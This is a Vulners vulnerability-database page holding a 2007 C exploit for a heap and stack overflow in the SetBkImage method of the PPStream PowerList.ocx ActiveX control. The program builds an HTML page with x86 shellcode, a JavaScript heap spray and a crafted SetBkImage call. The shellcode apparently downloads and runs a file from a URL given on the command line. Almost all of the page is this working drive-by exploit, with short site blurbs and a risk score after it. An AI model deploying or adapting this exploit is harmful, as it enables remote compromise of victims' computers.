Vulners
Lucene search
PPStream 2.1.6.2916 PowerList.ocx SetBkImage Overwrite Exploit
/*
PPStream
PowerList.ocx
2.1.6.2916
描述:
SetBkImage 堆和栈溢出, 还是以前的老问题。以前补的是PowerPlayer.dll中的
这里利用堆溢出和栈溢出,使用 CFindFile 对参数检查不严格,导致堆溢出。
在其析构时会导致异常,并且在析构之前发生了 strcat 导致栈溢出,覆盖掉
原来的 seh 处理程序
author: [email protected]
2007-11-11
*/
#define _CRT_SECURE_NO_DEPRECATE
#include <windows.h>
#include <stdio.h>
const unsigned char shellcode[174] =
{
// 必须是偶数大小
0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
};
const char* script1 = \\
\"<html><body><object id=\\\"ppc\\\" classid=\\\"clsid:20C2C286-BDE8-441B-B73D-AFA22D914DA5\\\"></object><script>\"
\"var shellcode = unescape(\\\"\";
const char* script2 = \\
\"\\\");\"
\"fillblock = unescape(\\\"%u9090邐\\\");\"
\"while ( fillblock.length < 0x30000 ) fillblock += fillblock;\"
\"memory = new Array();\"
\"for ( x = 0; x < 400; x++ ) memory[x] = fillblock + shellcode;\"
\"var buffer = \'\\\\x0a\\\\x0a\\\\x0a\\\\x0a\';\"
\"while (buffer.length < 300) buffer += \'\\\\x0a\\\\x0a\\\\x0a\\\\x0a\';\"
\"ppc.SetBkImage(buffer);\"
\"</script>\"
\"</body>\"
\"</html>\"
\"</script>\"
\"</body>\"
\"</html>\";
int main(int argc, char* argv[])
{
if ( argc != 2 )
{
printf(\"ex:fuckpps url\\nwritten by [email protected] (2007)\\n\");
return -1;
}
FILE *file = fopen(\"fuckpps.html\", \"w+\");
if ( file == NULL )
{
printf(\"create \'fuckpps.html\' failed!\\n\");
return -2;
}
fprintf(file, \"%s\", script1);
for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
fprintf(file, \"%%u%02X%02X\" , shellcode[i + 1], shellcode[i]);
const unsigned l = strlen(argv[1]);
for ( unsigned j = 0; j < l; j += 2 )
fprintf(file, \"%%u%02X%02X\" , argv[1][j + 1], argv[1][j]);
fprintf(file, \"%s\", script2);
fclose(file);
printf(\"make \'fuckpps.html\' successed!\\n\");
return 0;
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Nov 2007 00:00Current
7.1High risk
Vulners AI Score7.1